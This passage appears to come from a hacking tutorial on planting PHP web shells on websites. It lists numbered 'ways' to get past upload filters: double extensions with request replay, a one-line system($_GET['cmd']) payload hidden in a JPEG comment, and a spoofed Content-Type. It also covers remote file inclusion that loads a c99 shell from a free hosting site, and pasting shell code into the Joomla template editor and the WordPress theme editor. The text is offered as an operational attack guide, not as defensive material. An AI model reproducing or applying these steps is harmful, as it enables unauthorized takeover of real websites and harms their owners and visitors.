1. Rename your shell to shell.php.jpg (or whatever that site supports. In my case, the site
supports only jpg files. That's why I renamed it to shell.php.jpg.)
2. Open Firefox & start your Live HTTP Headers addon, after that upload your shell.
3. Then your Live HTTP Headers will look something similar to this
4. Then click on the shell.php.jpg, after that click on the Replay button.
5. Then again a new window will open; in that window there will be two boxes, but we have to
work on the second box.
6. In the second box, rename your shell.php.jpg to shell.php, then again click on the Replay button.
WAY 6
Find yourself a copy of edjpgcom.exe. "edjpgcom is a free Windows application that allows you
to change (or add) a JPEG comment in a JPEG file." Usage: edjpgcom "filename.jpg". Now
add this to the jpg comment, since you won't be able to drop a whole shell in there due to size
limits etc.
"; system($_GET['cmd']); echo ?>
Now rename your jpg to .php and upload.
WAY 7
Another way you can fool the web server into thinking you're uploading an image instead of a php shell is to
get Firefox and install the "tamperdata" addon, then click start tamper and upload your php shell, then
tamper the data and change the Content-Type from 'application/octet-stream' to 'image/jpeg'. If you have any
problem uploading a shell using tamperdata, then just do a simple google search. Many video tutorials
on this are available on the web, so I am not explaining this step by step.
WAY 8
All the above mentioned ways work when we find an upload button on the site. But when there is no upload
button, it's not easy to upload a shell there. We can try a few things. We have to find out if there is an
edit option for an existing php/asp/aspx page. If there is an edit option then open that page & delete the whole
script. After that, open your shell in notepad, copy the script and paste it into that page. Finally, save it. Now that
link will be your shell. We can possibly find an edit option in the following pages of a site:
Contact us.php / Contact us.asp
Class.php / Class.asp
About us.php / about us.asp
Terms.php / terms.asp
NB: some news, vehicle selling, cart etc. sites don't have any option to upload a file after logging in
through the admin panel. They only allow file upload after logging in through cpanel.
WAY 9
SOMETIMES, IN SOME REMOTE FILE INCLUSION VULNERABLE SITES, WE HAVE TO EXECUTE
A SHELL FROM ANOTHER HOSTING SITE. METHOD:
1) UPLOAD YOUR SHELL ON A FREE HOSTING SITE LIKE www.my3gb.com, www.3owl.com,
www.ripway.com, www.000webhost.com, etc.
2) Now suppose your shelled site link is www.example.my3gb.com/c99.txt & YOUR VULNERABLE
SITE IS www.site.com
3) Now we have to execute the following command to gain shell access to that site.
http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4) REPLACE THE SITE LINKS IN THE COMMAND ACCORDING TO YOUR SHELL &
VULNERABLE SITE LINK.
SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES
IN THE ABOVE MENTIONED SITES WE GENERALLY CAN'T FIND A DIRECT UPLOAD OPTION,
SO WE HAVE TO DO IT IN OTHER WAYS.
1. Joomla Site:
After logging into the admin panel you will find Extensions as the 5th menu item; expand it and click Template
Manager > check any template (like beez, ja_purity). Now click on Edit (upper right side), after this click on Edit
HTML, now paste your shell code and click save... done. The shell is at site.com/templates/template name/index.php, like
site.com/templates/beez/index.php
2. Wordpress:
Log into the admin panel, expand Appearance then click on Editor > you will find style.css.
Now select 404.php on the right side, paste your shell code and click Edit File. You can find the
shell in site.com/wp-content/themes/theme name you edited/404.php